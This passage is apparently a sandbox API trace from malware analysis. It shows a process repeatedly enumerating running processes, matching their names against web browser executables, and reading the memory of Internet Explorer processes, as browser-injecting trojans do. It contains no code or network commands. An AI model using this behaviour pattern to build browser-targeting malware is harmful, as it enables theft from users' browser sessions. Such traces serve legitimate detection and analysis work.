	[0246.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.776] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0246.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.776] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.778] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0246.779] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x96d4
	[0246.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.779] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0246.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.780] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.781] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0246.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.781] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.782] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0246.782] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x96d8
	[0246.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.783] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0246.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.783] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.783] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0246.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.784] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.784] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0246.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x96dc
	[0246.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.785] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0246.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.786] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.786] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0246.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.787] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.788] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0246.788] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x96e0
	[0246.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.789] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0246.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.789] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.790] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0246.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.790] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.790] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0246.791] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x96e4
	[0246.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.791] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0246.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.792] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0246.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.792] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0246.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.792] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.792] NtQueryInformationProcess (in: ProcessHandle=0x96e4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0246.793] ReadProcessMemory (in: hProcess=0x96e4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0246.793] ReadProcessMemory (in: hProcess=0x96e4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0246.793] ReadProcessMemory (in: hProcess=0x96e4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0246.793] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0246.794] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0246.794] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x96e8
	[0246.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.795] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0246.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.795] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0246.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.795] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0246.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.796] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.796] NtQueryInformationProcess (in: ProcessHandle=0x96e8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0246.796] ReadProcessMemory (in: hProcess=0x96e8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0246.796] ReadProcessMemory (in: hProcess=0x96e8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0246.796] ReadProcessMemory (in: hProcess=0x96e8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0246.796] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0246.797] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0246.797] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x96ec
	[0246.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.798] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0246.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.798] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.798] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0246.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.799] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.799] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0246.799] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x96f0
	[0246.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.800] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0246.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.800] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.800] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0246.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.801] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.801] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.802] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x96f4
	[0246.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.802] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.802] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.802] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.803] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.803] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.804] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x96f8
	[0246.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.804] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.805] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.805] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.805] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.806] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.806] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x96fc
	[0246.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.806] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.807] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.807] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.807] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.808] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0246.809] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9700
	[0246.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.809] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0246.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.809] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.810] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0246.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.810] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.810] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.811] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9704
	[0246.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.811] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.812] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.812] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.812] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.812] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.813] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9708
	[0246.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.813] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.814] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.814] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.814] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.814] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0246.815] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x970c
	[0246.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.815] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0246.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.816] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.816] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0246.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.816] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.817] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0246.817] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9710
	[0246.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.817] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.818] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.818] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.818] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.819] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0246.819] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9714
	[0246.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.819] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0246.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.820] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.820] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0246.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.820] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.820] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9718
	[0246.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.821] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0246.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.822] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.822] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0246.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.822] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.822] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0246.823] CloseHandle (hObject=0x4fd0) returned 1
	[0246.823] Sleep (dwMilliseconds=0x64) 
	[0246.949] GetCurrentProcessId () returned 0x110
	[0246.949] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0246.951] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0246.952] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0246.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0246.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x971c
	[0246.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.954] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.954] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.954] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.955] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.955] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0246.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x9720
	[0246.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.956] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0246.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.956] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.956] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0246.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.957] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0246.957] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0246.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x9724
	[0246.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.958] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0246.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.958] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0246.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.958] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0246.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0246.959] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
